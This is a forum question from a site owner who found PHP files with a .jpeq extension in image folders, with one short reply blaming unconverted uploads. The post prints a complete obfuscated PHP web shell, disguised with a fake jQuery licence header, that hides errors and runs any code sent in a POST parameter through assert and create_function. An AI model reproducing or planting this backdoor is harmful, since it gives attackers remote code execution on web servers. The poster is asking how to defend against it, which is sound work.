A
A
Alexey Tutubalin2019-05-17 17:30:13
PHP
Alexey Tutubalin, 2019-05-17 17:30:13

How to prevent jpeq nginx from opening?

This is not the first time that files appear on the site in directories with images with the jpeq extension inside which php code, for example

<?php 
/*
 * jQuery Image Library v1.6.1
 * http://jquery.com/
 *
 * Copyright 2011, John Resig
 * Dual licensed under the MIT or GPL Version 2 licenses.
 * http://jquery.org/license
 *
 * Includes Sizzle.js
 * http://sizzlejs.com/
 * Copyright 2011, The Dojo Foundation
 * Released under the MIT, BSD, and GPL Licenses.
 *
 * Date: Thu May 12 15:04:36 2011 -0400
 *  *  *  *  *  *  * *  *  *  *  *  *  *  *  *  *  *  *  *  Don't delete this file *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  * 
 */
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@error_reporting(0);
@set_time_limit(0);
$cret='unct' .'ion';$cret= 'cre' . 'ate' .'_f' .$cret;
$jQuery='sert';$jQuery='as'.$jQuery;$Libr= "_ostp";
$sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3] );
if(isset(${$sizz}['j01bt5ri3p'])){@$cret('', '};'.${$sizz}['j01bt5ri3p'].'{');}
if(isset(${$sizz}['j01bt5ri3p'])){@$jQuery(${$sizz}['j01bt5ri3p']);} 
print"<!-- te"."st --> "; 
?>

I understand this is a hole somewhere, I'm 99% sure it's somewhere in the settings of the software and not the site itself, but how to find it?
How can I prevent opening such files in the nginx config?

Answer the question

In order to leave comments, you need to log in

1 answer(s)
S
sim3x, 2019-05-17
@Kennius

nginx has nothing to do with it
Look for a problem in who uploads images without conversion

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question